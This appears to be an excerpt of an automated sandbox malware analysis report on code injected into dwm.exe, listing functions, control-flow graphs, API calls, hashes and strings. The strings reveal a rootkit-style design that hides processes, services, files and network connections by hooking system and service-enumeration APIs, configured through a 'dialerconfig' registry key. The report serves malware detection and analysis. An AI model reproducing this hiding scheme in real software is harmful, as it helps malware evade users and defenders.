283e0f513d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14856->14857 14858 283e0f5141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14856->14858 14859 283e0f5152c 14856->14859 14857->14858 14858->14856 14860 283e0f51546 14859->14860 14863 283e0f5157c 14859->14863 14861 283e0f51565 StrCmpW 14860->14861 14862 283e0f5155d StrCmpIW 14860->14862 14860->14863 14861->14860 14862->14860 14863->14856 14864 283e0f5554d 14866 283e0f55554 14864->14866 14865 283e0f555bb 14866->14865 14867 283e0f55637 VirtualProtect 14866->14867 14868 283e0f55663 GetLastError 14867->14868 14869 283e0f55671 14867->14869 14868->14869

                                                        Executed Functions

                                                        Function 00000283E0F51628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 961100c90e480e96f978f84af5b46bbd74024422d547977699f4927afcb3459e
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: E8714E7A712A0596EF20DF65E86865D2365FF84F88F009131DD4E47B69DF38CA66C380
                                                        Function 00000283E0F53790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 7c571039a5083a7ed3741a0a616124c0762ee123ca80e317b4bca8d85789b135
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 79115E6A70674682EF14DB55F42826963A0FB49F85F448039DE8907754EF3DCA16C744
                                                        Function 00000283E0F55B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 57 283e0f55b30-283e0f55b57 58 283e0f55b59-283e0f55b68 57->58 59 283e0f55b6b-283e0f55b76 GetCurrentThreadId 57->59 58->59 60 283e0f55b78-283e0f55b7d 59->60 61 283e0f55b82-283e0f55b89 59->61 62 283e0f55faf-283e0f55fc6 call 283e0f57940 60->62 63 283e0f55b9b-283e0f55baf 61->63 64 283e0f55b8b-283e0f55b96 call 283e0f55960 61->64 66 283e0f55bbe-283e0f55bc4 63->66 64->62 70 283e0f55bca-283e0f55bd3 66->70 71 283e0f55c95-283e0f55cb6 66->71 73 283e0f55c1a-283e0f55c8d call 283e0f54510 call 283e0f544b0 call 283e0f54470 70->73 74 283e0f55bd5-283e0f55c18 call 283e0f585c0 70->74 75 283e0f55e1f-283e0f55e30 call 283e0f574bf 71->75 76 283e0f55cbc-283e0f55cdc GetThreadContext 71->76 86 283e0f55c90 73->86 74->86 90 283e0f55e35-283e0f55e3b 75->90 79 283e0f55e1a 76->79 80 283e0f55ce2-283e0f55d03 76->80 79->75 80->79 89 283e0f55d09-283e0f55d12 80->89 86->66 92 283e0f55d14-283e0f55d25 89->92 93 283e0f55d92-283e0f55da3 89->93 94 283e0f55e41-283e0f55e98 VirtualProtect FlushInstructionCache 90->94 95 283e0f55efe-283e0f55f0e 90->95 99 283e0f55d27-283e0f55d3c 92->99 100 283e0f55d8d 92->100 103 283e0f55e15 93->103 104 283e0f55da5-283e0f55dc3 93->104 101 283e0f55e9a-283e0f55ea4 94->101 102 283e0f55ec9-283e0f55ef9 call 283e0f578ac 94->102 97 283e0f55f10-283e0f55f17 95->97 98 283e0f55f1e-283e0f55f2a call 283e0f54df0 95->98 97->98 106 283e0f55f19 call 283e0f543e0 97->106 119 283e0f55f2f-283e0f55f35 98->119 99->100 108 283e0f55d3e-283e0f55d88 call 283e0f53970 SetThreadContext 99->108 100->103 101->102 109 283e0f55ea6-283e0f55ec1 call 283e0f54390 101->109 102->90 104->103 110 283e0f55dc5-283e0f55e10 call 283e0f53900 call 283e0f574dd 104->110 106->98 108->100 109->102 110->103 123 283e0f55f77-283e0f55f95 119->123 124 283e0f55f37-283e0f55f75 ResumeThread call 283e0f578ac 119->124 126 283e0f55f97-283e0f55fa6 123->126 127 283e0f55fa9 123->127 124->119 126->127 127->62
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                        • Instruction ID: 4fde9d88b9d2a979f95deb9a0a06018f8c9113f3ee8e68dc93fbe4c6d2ae4db7
                                                        • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                        • Instruction Fuzzy Hash: CFD1BE7A216B4882DE70DB4AE4A935A77A0F788F85F144126EECD47B65CF3CC652CB40
                                                        Function 00000283E0F550D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 129 283e0f550d0-283e0f550fc 130 283e0f550fe-283e0f55106 129->130 131 283e0f5510d-283e0f55116 129->131 130->131 132 283e0f55118-283e0f55120 131->132 133 283e0f55127-283e0f55130 131->133 132->133 134 283e0f55132-283e0f5513a 133->134 135 283e0f55141-283e0f5514a 133->135 134->135 136 283e0f55156-283e0f55161 GetCurrentThreadId 135->136 137 283e0f5514c-283e0f55151 135->137 139 283e0f55163-283e0f55168 136->139 140 283e0f5516d-283e0f55174 136->140 138 283e0f556d3-283e0f556da 137->138 139->138 141 283e0f55176-283e0f5517c 140->141 142 283e0f55181-283e0f5518a 140->142 141->138 143 283e0f55196-283e0f551a2 142->143 144 283e0f5518c-283e0f55191 142->144 145 283e0f551a4-283e0f551c9 143->145 146 283e0f551ce-283e0f55225 call 283e0f556e0 * 2 143->146 144->138 145->138 151 283e0f55227-283e0f5522e 146->151 152 283e0f5523a-283e0f55243 146->152 153 283e0f55236 151->153 154 283e0f55230 151->154 155 283e0f55255-283e0f5525e 152->155 156 283e0f55245-283e0f55252 152->156 153->152 158 283e0f552a6-283e0f552aa 153->158 157 283e0f552b0-283e0f552b6 154->157 159 283e0f55273-283e0f55298 call 283e0f57870 155->159 160 283e0f55260-283e0f55270 155->160 156->155 162 283e0f552b8-283e0f552d4 call 283e0f54390 157->162 163 283e0f552e5-283e0f552eb 157->163 158->157 168 283e0f5529e 159->168 169 283e0f5532d-283e0f55342 call 283e0f53cc0 159->169 160->159 162->163 173 283e0f552d6-283e0f552de 162->173 166 283e0f55315-283e0f55328 163->166 167 283e0f552ed-283e0f5530c call 283e0f578ac 163->167 166->138 167->166 168->158 176 283e0f55344-283e0f5534c 169->176 177 283e0f55351-283e0f5535a 169->177 173->163 176->158 178 283e0f5536c-283e0f553ba call 283e0f58c60 177->178 179 283e0f5535c-283e0f55369 177->179 182 283e0f553c2-283e0f553ca 178->182 179->178 183 283e0f554d7-283e0f554df 182->183 184 283e0f553d0-283e0f554bb call 283e0f57440 182->184 185 283e0f55523-283e0f5552b 183->185 186 283e0f554e1-283e0f554f4 call 283e0f54590 183->186 196 283e0f554bf-283e0f554ce call 283e0f54060 184->196 197 283e0f554bd 184->197 189 283e0f55537-283e0f55546 185->189 190 283e0f5552d-283e0f55535 185->190 198 283e0f554f8-283e0f55521 186->198 199 283e0f554f6 186->199 194 283e0f55548 189->194 195 283e0f5554f 189->195 190->189 193 283e0f55554-283e0f55561 190->193 200 283e0f55564-283e0f555b9 call 283e0f585c0 193->200 201 283e0f55563 193->201 194->195 195->193 205 283e0f554d0 196->205 206 283e0f554d2 196->206 197->183 198->183 199->185 208 283e0f555c8-283e0f55661 call 283e0f54510 call 283e0f54470 VirtualProtect 200->208 209 283e0f555bb-283e0f555c3 200->209 201->200 205->183 206->182 214 283e0f55663-283e0f55668 GetLastError 208->214 215 283e0f55671-283e0f556d1 208->215 214->215 215->138
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                        • Instruction ID: ac642eded311a41be68fee7d927ed38165d4c38dabb135597c116e1eb5946026
                                                        • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                        • Instruction Fuzzy Hash: 8A02CC3621AB8486EB60CB95F4A435AB7A1F7C4F95F104025EA8E87B68DF7CC955CB00
                                                        Function 00000283E0F539E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Virtual$AllocQuery
                                                        • String ID:
                                                        • API String ID: 31662377-0
                                                        • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                        • Instruction ID: 9d8a442192541ed66a3c52caa7cc00584a5267327734ea30ca9e3a8eb4c27065
                                                        • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                        • Instruction Fuzzy Hash: 9031282D21BA8481EE30DB5DE06935E6694FB84F84F108535F9CD46B98DF7CCB628B44
                                                        Function 00000283E0F5328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: ca0e0f4bc485f37b0edc0d0148e7ee94eb8dad14b2baac73d92b19fa1f73fa75
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: A111C079A2660282FF60DBA4F83D3692294BF54F04F54C138AD06816A1EF78CB778350
                                                        Function 00000283E0F54DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                        • String ID:
                                                        • API String ID: 3733156554-0
                                                        • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                        • Instruction ID: 998bb07d42bb39a83050369ae337537ecae4872717d47ae44a7ba8f2f1e19c79
                                                        • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                        • Instruction Fuzzy Hash: 84F03629615B44C1DE30DB45F46534A6BA0F788FD4F148121FD8D03B69CE3CCBA28B40
                                                        Function 00000283E0F2273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 263 283e0f2273c-283e0f227a4 call 283e0f229d4 * 4 272 283e0f227aa-283e0f227ad 263->272 273 283e0f229b2 263->273 272->273 274 283e0f227b3-283e0f227b6 272->274 275 283e0f229b4-283e0f229d0 273->275 274->273 276 283e0f227bc-283e0f227bf 274->276 276->273 277 283e0f227c5-283e0f227e6 VirtualAlloc 276->277 277->273 278 283e0f227ec-283e0f2280c 277->278 279 283e0f22838-283e0f2283f 278->279 280 283e0f2280e-283e0f22836 278->280 281 283e0f22845-283e0f22852 279->281 282 283e0f228df-283e0f228e6 279->282 280->279 280->280 281->282 285 283e0f22858-283e0f2286a LoadLibraryA 281->285 283 283e0f228ec-283e0f22901 282->283 284 283e0f22992-283e0f229b0 282->284 283->284 288 283e0f22907 283->288 284->275 286 283e0f228ca-283e0f228d2 285->286 287 283e0f2286c-283e0f22878 285->287 286->285 290 283e0f228d4-283e0f228d9 286->290 289 283e0f228c5-283e0f228c8 287->289 292 283e0f2290d-283e0f22921 288->292 289->286 293 283e0f2287a-283e0f2287d 289->293 290->282 294 283e0f22923-283e0f22934 292->294 295 283e0f22982-283e0f2298c 292->295 296 283e0f228a7-283e0f228b7 293->296 297 283e0f2287f-283e0f228a5 293->297 299 283e0f22936-283e0f2293d 294->299 300 283e0f2293f-283e0f22943 294->300 295->284 295->292 304 283e0f228ba-283e0f228c1 296->304 297->304 301 283e0f22970-283e0f22980 299->301 302 283e0f22945-283e0f2294b 300->302 303 283e0f2294d-283e0f22951 300->303 301->294 301->295 302->301 305 283e0f22963-283e0f22967 303->305 306 283e0f22953-283e0f22961 303->306 304->289 305->301 308 283e0f22969-283e0f2296c 305->308 306->301 308->301
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812384683.00000283E0F20000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F20000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f20000_dwm.jbxd
                                                        Similarity
                                                        • API ID: AllocLibraryLoadVirtual
                                                        • String ID:
                                                        • API String ID: 3550616410-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 002df8d96c72294bbaf21b0188a9e11a20fa2ef8ddea590db22a8dae7283680f
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: C761247AB0269097DB94CF15A02876D7392FB64FA4F58C131DE5907788DE38D9A3D700
                                                        Function 00000283E0F51ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00000283E0F51628: GetProcessHeap.KERNEL32 ref: 00000283E0F51633
                                                          • Part of subcall function 00000283E0F51628: HeapAlloc.KERNEL32 ref: 00000283E0F51642
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F516B2
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F516DF
                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F516F9
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F51719
                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F51734
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F51754
                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F5176F
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F5178F
                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F517AA
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F517CA
                                                        • Sleep.KERNEL32 ref: 00000283E0F51AD7
                                                        • SleepEx.KERNELBASE ref: 00000283E0F51ADD
                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F517E5
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F51805
                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F51820
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F51840
                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F5185B
                                                          • Part of subcall function 00000283E0F51628: RegOpenKeyExW.ADVAPI32 ref: 00000283E0F5187B
                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F51896
                                                          • Part of subcall function 00000283E0F51628: RegCloseKey.ADVAPI32 ref: 00000283E0F518A0
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: a1110054fa346980828b07f09b404bb4081c8b8a7b8c07b74fb48bab85e4b3c3
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 4B310F6920264151FF50DB66D6693A923A6BF85FD0F08D4318E0987295FF34EE73C311

                                                        Non-executed Functions

                                                        Function 00000283E0F52B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 561 283e0f52b2c-283e0f52ba5 call 283e0f72ce0 564 283e0f52ee0-283e0f52f03 561->564 565 283e0f52bab-283e0f52bb1 561->565 565->564 566 283e0f52bb7-283e0f52bba 565->566 566->564 567 283e0f52bc0-283e0f52bc3 566->567 567->564 568 283e0f52bc9-283e0f52bd9 GetModuleHandleA 567->568 569 283e0f52bdb-283e0f52beb GetProcAddress 568->569 570 283e0f52bed 568->570 571 283e0f52bf0-283e0f52c0e 569->571 570->571 571->564 573 283e0f52c14-283e0f52c33 StrCmpNIW 571->573 573->564 574 283e0f52c39-283e0f52c3d 573->574 574->564 575 283e0f52c43-283e0f52c4d 574->575 575->564 576 283e0f52c53-283e0f52c5a 575->576 576->564 577 283e0f52c60-283e0f52c73 576->577 578 283e0f52c83 577->578 579 283e0f52c75-283e0f52c81 577->579 580 283e0f52c86-283e0f52c8a 578->580 579->580 581 283e0f52c9a 580->581 582 283e0f52c8c-283e0f52c98 580->582 583 283e0f52c9d-283e0f52ca7 581->583 582->583 584 283e0f52d9d-283e0f52da1 583->584 585 283e0f52cad-283e0f52cb0 583->585 588 283e0f52da7-283e0f52daa 584->588 589 283e0f52ed2-283e0f52eda 584->589 586 283e0f52cc2-283e0f52ccc 585->586 587 283e0f52cb2-283e0f52cbf call 283e0f5199c 585->587 591 283e0f52d00-283e0f52d0a 586->591 592 283e0f52cce-283e0f52cdb 586->592 587->586 593 283e0f52dac-283e0f52db8 call 283e0f5199c 588->593 594 283e0f52dbb-283e0f52dc5 588->594 589->564 589->577 599 283e0f52d3a-283e0f52d3d 591->599 600 283e0f52d0c-283e0f52d19 591->600 592->591 598 283e0f52cdd-283e0f52cea 592->598 593->594 595 283e0f52dc7-283e0f52dd4 594->595 596 283e0f52df5-283e0f52df8 594->596 595->596 605 283e0f52dd6-283e0f52de3 595->605 606 283e0f52dfa-283e0f52e03 call 283e0f51bbc 596->606 607 283e0f52e05-283e0f52e12 lstrlenW 596->607 608 283e0f52ced-283e0f52cf3 598->608 602 283e0f52d3f-283e0f52d49 call 283e0f51bbc 599->602 603 283e0f52d4b-283e0f52d58 lstrlenW 599->603 600->599 609 283e0f52d1b-283e0f52d28 600->609 602->603 616 283e0f52d93-283e0f52d98 602->616 611 283e0f52d5a-283e0f52d64 603->611 612 283e0f52d7b-283e0f52d8d call 283e0f53844 603->612 613 283e0f52de6-283e0f52dec 605->613 606->607 623 283e0f52e4a-283e0f52e55 606->623 617 283e0f52e14-283e0f52e1e 607->617 618 283e0f52e35-283e0f52e3f call 283e0f53844 607->618 615 283e0f52cf9-283e0f52cfe 608->615 608->616 619 283e0f52d2b-283e0f52d31 609->619 611->612 622 283e0f52d66-283e0f52d79 call 283e0f5152c 611->622 612->616 627 283e0f52e42-283e0f52e44 612->627 613->623 624 283e0f52dee-283e0f52df3 613->624 615->591 615->608 616->627 617->618 628 283e0f52e20-283e0f52e33 call 283e0f5152c 617->628 618->627 619->616 629 283e0f52d33-283e0f52d38 619->629 622->612 622->616 631 283e0f52e57-283e0f52e5b 623->631 632 283e0f52ecc-283e0f52ed0 623->632 624->596 624->613 627->589 627->623 628->618 628->623 629->599 629->619 636 283e0f52e63-283e0f52e7d call 283e0f585c0 631->636 637 283e0f52e5d-283e0f52e61 631->637 632->589 640 283e0f52e80-283e0f52e83 636->640 637->636 637->640 643 283e0f52ea6-283e0f52ea9 640->643 644 283e0f52e85-283e0f52ea3 call 283e0f585c0 640->644 643->632 646 283e0f52eab-283e0f52ec9 call 283e0f585c0 643->646 644->643 646->632
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: ab0d64a5416b57942df9a7c973dfc803437d304260f5776b799f0c733712809b
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: CBB1E32A212A4082EFA9CFA5D46876973A4FF66F94F04D136EE0953794DF34CE62C340
                                                        Function 00000283E0F57D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: e6e0de8a53571f7540c7d917c7a984e075afd5abad5c7e0965ce991b2570c8f0
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: 62315D76206B848AEB60DF60F8643ED7364FB84B44F44802ADA4D57B94EF38CA59C750
                                                        Function 00000283E0F5D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 56beb5a61bd6c6a2183787bf793ff039cda336b94d6471ce9543db9c649f1505
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: EA31933A215F8086EB60CF65E85439E73A0FB89B54F504135EE9D43B54DF38C666CB40
                                                        Function 00000283E0F512BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: dfa00ffd4f990c4f5113f75cc1f8cea44e1a31c95c2910c771efd7c6427a0543
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 91515D7A201B8986EB50CF62F56835A77A2FB8AF89F048134DE4947718DF3CC666C740
                                                        Function 00000283E0F51D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002A.00000002.2812434545.00000283E0F50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F50000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_42_2_283e0f50000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: 606f4f3faa3cbb741394662a736617162935932ec5c725c39a3b0e4e04a2b483
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: C131C26C51390EA0EE41EBE6E8796D83321BF60F54F84C2339C4906165DF788B6BC390
                                                        Function 00000283E0F26910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
